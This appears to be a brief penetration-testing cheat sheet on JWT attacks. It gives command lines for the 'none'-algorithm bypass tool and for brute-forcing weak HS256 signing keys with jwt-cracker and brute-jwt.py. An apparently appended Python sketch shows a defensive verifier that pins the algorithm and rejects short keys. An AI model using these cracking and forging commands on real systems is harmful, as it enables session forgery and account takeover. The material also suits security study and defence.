JWT Attacks

JWT

Decode token:

"None" algorithm

Get TokenBreaker

python3 TheNone.py -t <token>

Bruteforcing: Weak Signing Key

JWT-Cracker

Get jwt-cracker

jwt-cracker "<Token>" "abcdefghijklmnopqrstuvwxyz" 6
jwt-cracker "<Token>" "1234567890" 6

Brute-jwt

Get brute-jwt.py

python brute-jwt.py --file /usr/share/wordlists/secrets.txt --algorithm HS256 --token <Token>
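
Defending against both issues above ("none" algorithm and weak signing key): the sketch below is an added example, not code from any of the tools listed on this page. It pins HS256 in the verifier and refuses short keys. The names verify_hs256, sign_hs256, TokenRejected and the 32-byte minimum are assumptions chosen for illustration.

```python
import base64, hashlib, hmac, json

MIN_KEY_BYTES = 32  # assumed policy: HS256 key at least as long as the SHA-256 output

class TokenRejected(Exception):
    """Raised for any token that must not be trusted."""

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(payload: dict, key: bytes) -> str:
    """Issue a token (used here only to build constructed sample input)."""
    head = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"

def verify_hs256(token: str, key: bytes) -> dict:
    """Return the payload only if the token is HS256-signed with `key`."""
    if len(key) < MIN_KEY_BYTES:
        raise ValueError("signing key is short enough to be guessed offline")
    parts = token.split(".")
    if len(parts) != 3:
        raise TokenRejected("expected header.payload.signature")
    try:
        header = json.loads(b64url_decode(parts[0]))
        payload = json.loads(b64url_decode(parts[1]))
        signature = b64url_decode(parts[2])
    except ValueError as exc:  # bad base64, bad UTF-8 or bad JSON
        raise TokenRejected("malformed segment") from exc
    # The verifier pins the algorithm; the header's "alg" is only checked against
    # it, never used to select one. "none", "None" and "NONE" all fail this test.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise TokenRejected("algorithm not allowed")
    expected = hmac.new(key, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        raise TokenRejected("signature mismatch")
    if not isinstance(payload, dict):
        raise TokenRejected("payload is not a JSON object")
    return payload

if __name__ == "__main__":
    key = bytes(range(32))  # constructed key for the demo; use a CSPRNG in practice
    good = sign_hs256({"sub": "alice"}, key)
    print(verify_hs256(good, key))
```

Claims such as exp and aud are not checked here; a production verifier validates them after the signature passes.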
